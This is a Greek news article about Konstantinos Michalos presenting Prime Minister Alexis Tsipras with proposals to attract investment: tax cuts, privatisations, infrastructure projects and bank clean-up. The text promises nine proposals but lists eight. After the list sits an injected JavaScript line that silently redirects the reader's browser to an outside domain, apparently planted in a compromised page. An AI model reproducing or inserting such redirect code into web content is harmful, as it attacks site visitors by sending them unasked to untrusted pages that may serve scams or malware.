Το εθνικό σχέδιο προσέλκυσης επενδύσεων παρουσίασε ο Μίχαλος στον Τσίπρα

0
6

 

 Την ανάγκη δημιουργίας ενός εθνικού σχεδίου για την προσέλκυση επενδύσεων, το οποίο θα περιλαμβάνει κίνητρα τόσο για τους ξένους, όσους και τους εγχώριους επενδυτές επεσήμανε ο πρόεδρος της Κεντρικής Ένωσης Επιμελητηρίων Ελλάδος, Κωνσταντίνος Μίχαλος στον πρωθυπουργό Αλέξη Τσίπρα.

Στη διάρκεια συνάντησης τους ο κ.Μίχαλος παρουσίασε δέσμη εννιά προτάσεων για την προσέλκυση επενδύσεων και τη μείωση της ανεργίας.

Βασική προϋπόθεση για την επιτυχία ενός τέτοιου εγχειρήματος – εξήγησε – είναι η σταδιακή επιστροφή των κεφαλαίων που βρίσκονται στο εξωτερικό και η αξιοποίηση αδρανών κεφαλαίων στο εσωτερικό της χώρας, σε συνδυασμό με τη μείωση των φορολογικών συντελεστών και τη βελτίωση της αποτελεσματικότητας της δημόσιας διοίκησης.

Τόνισε ακόμη, ότι ο εθνικός στόχος για την προσέλκυση επενδύσεων συνολικού ύψους 100 δισ. ευρώ, «δεν πρόκειται ποτέ να επιτευχθεί» με αυξήσεις φορολογικών συντελεστών.

Οι εννέα προτάσεις του κ. Μίχαλου

  • Μείωση φορολογικών συντελεστών (flat rate 20% για τις επιχειρήσεις, σταδιακή μείωση των συντελεστών ΦΠΑ)
  • Συρρίκνωση του κράτους, εκτεταμένες συγχωνεύσεις και καταργήσεις φορέων του δημοσίου, χορήγηση κοινωνικών επιδομάτων και παροχών, με αυστηρά εισοδηματικά κριτήρια.
  • Διεύρυνση της φορολογικής βάσης θέσπιση δύο μόνο συντελεστών φορολογίας εισοδήματος, 22% και 33%, για όλα τα είδη εισοδημάτων, διατήρηση του κύριου ΕΝΦΙΑ και κατάργηση του συμπληρωματικού με μεταφορά του στην Τοπική Αυτοδιοίκηση, αποτελεσματικότερη καταπολέμηση του παραεμπορίου.
  • Διαρθρωτικές αλλαγές (προσαρμογή της εργατικής νομοθεσίας στα ευρωπαϊκά δεδομένα, ολοκλήρωση του κτηματολογίου και του χωροταξικού σχεδιασμού, μείωση του κόστους της ενέργειας και ειδικά των βιομηχανικών τιμολογίων).
  • Στήριξη εξαγωγών με φορολογικά κίνητρα και κατάργηση επιβαρύνσεων.
  • Αποκρατικοποιήσεις και αξιοποίηση της δημόσιας περιουσίας
  • Ταχεία υλοποίηση συγκεκριμένων projects προσέλκυσης επενδύσεων, όπως η αξιοποίηση της έκτασης στο Ελληνικό, η κατασκευή του αεροδρομίου στο Καστέλι της Κρήτης, η επέκταση της Αττικής Οδού και του ΜΕΤΡΟ της Αθήνας, η κατασκευή έργων πράσινης ενέργειας, η αξιοποίηση δημοσίων ακινήτων στο παράκτιο μέτωπο της Αττικής (άξονας Σούνιο – Φάληρο).
  • Λύση στο θέμα της διαχείρισης των μη εξυπηρετούμενων δανείων, με βιώσιμα σχέδια αναδιάρθρωσης επιχειρήσεων και σεβασμό στο ανταγωνισμό.
  • Ολοκλήρωση της εξυγίανσης των τραπεζών.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here